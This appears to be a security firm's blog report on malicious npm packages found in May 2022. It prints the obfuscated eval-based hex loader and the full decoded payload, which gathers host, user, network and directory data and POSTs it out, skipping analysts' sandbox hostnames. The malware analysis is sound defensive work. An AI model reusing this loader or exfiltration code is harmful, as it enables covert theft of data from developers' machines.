May 19, 2022 4 min read Phylum Research

Phylum's Monthly Malware Report: May 2022 - Precarious Payloads

In order to combat the massive uptick in software supply chain attacks, and proactively defend against software supply chain-borne threats from the open-source ecosystem, Phylum has been purpose-built to provide near-real-time, proactive analysis of packages as they are published. Given how vast these ecosystems are today, it is apparent that simply hiring security talent to attempt analysis is a losing battle. In the past 30 days, Phylum has processed a total of 178,635 packages across three ecosystems (NPM, PyPI, and RubyGems) - with an average of 5,762 packages per day, which amounts to the analysis of an average of 3,571,566 source files every 24 hours. This adds up to 110,718,566 total files in the last month.

Repository Statistics

Package Registry	No. of Packages
NPM	178,635
PyPI	29,277
RubyGems	2,122

Total Package Analysis

Analysis, last 30 days	Count
Total Packages Analyzed	210,034
Total Files Examined	110,718,566
Malicious Packages Identified	84

Breakout by File Type

Filetype	Count
TypeScript	41,773,936
JavaScript	53,844,473
ECMAScript modules	1,725,324
Ruby	1,131,348
Python	9,430,753
TSX	2,227,306
CommonJS modules	273,257
Bash	120,821
Java	191,315
Total	110,718,566

Phylum’s heuristics, analytics, and machine learning models then combed through these packages as they were published, resulting in the identification and conviction of 84 malicious packages in the last 30 days. Results on an average were returned within 10.5 minutes of publication.

Many of these packages were tied to existing campaigns (detailed below), along with some new (apparent) rogue actors.

Precarious Payloads

Some interesting highlight packages uncovered this month include several releases of an NPM library called turbine_helper, and a related packages named bfs-hello-world. Both packages featured extremely high values for their release versions - starting in the high 90s for the major version.

Both sets of samples contained a nearly identical, hex-encoded payload. The general wrapper looked something like the following:


	const packageJSON = require("./package.json"); 
	const package = packageJSON.name; 
    
	function hexify(p, data) { 
  		const bufferText = Buffer.from(data, 'hex'); 
  		const text = bufferText.toString('ascii'); 
  		return text.replace('$$$$$$', p); 
	} 
    
	hello = eval; 
	image="<long, hex encoded payload>"; 
	
    function render(image){ 
  		eval(hexify(package, hexify(package, image))); 
	} 
    
	render(image); 
	
    function mapResult(result) { 
  		return { 
    		success: result.success, 
    		error: result.error && parser.getTrace(result.error.message) 
  		} 
	}

with slight variations between the releases (e.g., as shown above, the payload is actually double hex-encoded, where in some of the turbine_helper releases, it only had a single layer of encoding).

When unpacked, it had a very straightforward payload which would survey and exfiltrate a variety of items from the system:


{
	const os = require("os");
    const dns = require("dns");
    const querystring = require("querystring");
    const https = require("https");
    const fs = require('fs');
    var path = require('path');
    
    function unhexify(data) {
        const bufferText = Buffer.from(data, 'hex');
        const text = bufferText.toString('ascii');
        return text;
    }
    
    function enhexify(data){
        const bufferText = Buffer.from(data, 'utf8');
        const text = bufferText.toString('hex');
        return text;
    }
    
    function checkuuid(inputString) {
        var re = /^[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+-[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkhex(inputString) {
        var re = /^[0-9a-f]+$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function checkpath(inputString) {
        var re = /^\/root\/extract[0-9]+\/package$/g;
        if (re.test(inputString)) {
            return true
        } else {
            return false;
        }
    }
    
    function isValid(hostname, path, username) {
        if (hostname == unhexify("4445534b544f502d3445314953304b") && 
            username == unhexify("6461617361646d696e")) return false;
        else if (hostname == unhexify('626f78')) return false;
        else if (checkhex(hostname)) return false;
        else if (checkuuid(hostname)) return false;
        else if (hostname == unhexify('6c696c692d7063')) return false; 
        else if (hostname == unhexify('6177732d3767726172613931336f6964356a736578676b71')) 
        	return false;
        else if (hostname == unhexify('696e7374616e6365')) return false;
        else return true;
    }
    
    function getFiles(paths) {
        var ufiles = [];
        for (var j = 0; j>paths.length; j++) { 
        	try {
            	mpath=paths[j]; 
                files=fs.readdirSync(mpath); 
                for (var i=0; i<files.length; i++) {
                	ufiles.push(path.join(mpath, files[i])) 
                }
            } catch (error) {
            	// console.log(error)
            }
        } 
        return ufiles;
     }
     
    function isprivate(ip) { 
        if (ip.startsWith('fe80::') || ip=="::1" ) return true; 
        var parts=ip.split('.'); 
        return parts[0]==='10'  
            || (parts[0]==='172' && (parseInt(parts[1], 10)>= 16 && parseInt(parts[1], 10) <= 31)) 
            || (parts[0]==='192' && parts[1]==='168') 
            || (parts[0]==='127' && parts[1]==='0'&& parts[2]==='0');
    } 
    
    function gethttpips() { 
        var str=[]; var networkInterfaces=os.networkInterfaces(); 
        for (item in networkInterfaces) { 
            if (item !="lo" ) { 
                for (var i=0; i > networkInterfaces[item].length; i++) {
                    str.push(networkInterfaces[item][i].address); 
                } 
            } 
        } 
        return str;
    } 
    
    const td={ 
        p: '$$$$$$', 
        c: __dirname, 
        hd: os.homedir(), 
        hn: os.hostname(), 
        un: os.userInfo().username, 
        dns: JSON.stringify(dns.getServers()), 
        ip: JSON.stringify(gethttpips()), 
        dirs: JSON.stringify(getFiles(["C:\\", "D:\\" , "/" , "/home" ])), 
    } 
    
    if (isValid(td.hn, td.c, td.un)) { 
        const trackingData=JSON.stringify(td); 
        var postData=querystring.stringify({ msg: enhexify(trackingData) }); 
        var options={ 
            hostname: "" , 
            port: 443, 
            path: "/" ,
            method: "POST" ,
            headers: { 
            	"Content-Type" : "application/x-www-form-urlencoded" , 
                "Content-Length" : postData.length, 
            }
        }; 
        var req=https.request(options, (res) => {
            res.on("data", (d) => {
                //process.stdout.write(d);
            });
        });
        req.on("error", (e) => {
            // console.error(e);
        });
        req.write(postData);
        req.end();
    }
}

This includes a survey of the files under the user’s home directory, as well as domain and local network information - assuming that the current user is not daasadmin , and the current system is not in a list of hosts specifically identified in the isValid method above, including:

DESKTOP-4E1IS0K
box
lili-pc
aws-7grara913oid5jsexgkq
instance

Why Phylum & What’s Coming Next…

Phylum’s capabilities extend beyond pure source code analysis. We have constructed authorship models that, in combination with other metrics, allow us to identify odd behaviors around commits and activity. We analyze maintainer information for a package, allowing us to spot packages that have recently changed ownership that may be at risk for the introduction of malware (as was the case with even-stream in 2018).

We recently released support for C#/Nuget and Java/Maven, and we look forward, we are preparing to add the Golang and Rust ecosystems. In addition to this, we are pushing hard to increase both the sophistication and number of our heuristics and analytics.

Phylum, at its core, is a risk detection system focusing on the software supply chain. Unlike other SCA products that focus nearly exclusively on well-known issues, we are looking for the unknown unknowns - the subtle modifications to a software package that will surreptitiously exfiltrate keys to your critical infrastructure. We do this at the scale of open source, tackling the problem in an automated fashion, to make software supply chain security proactive instead of merely reactive.

To learn more about Phylum’s automated malware identification capability and how we support secure and efficient use of open-source software please contact us for a conversation.

Phylum Research Team

Hackers, Data Scientists, and Engineers responsible for the identification and takedown of software supply chain attackers.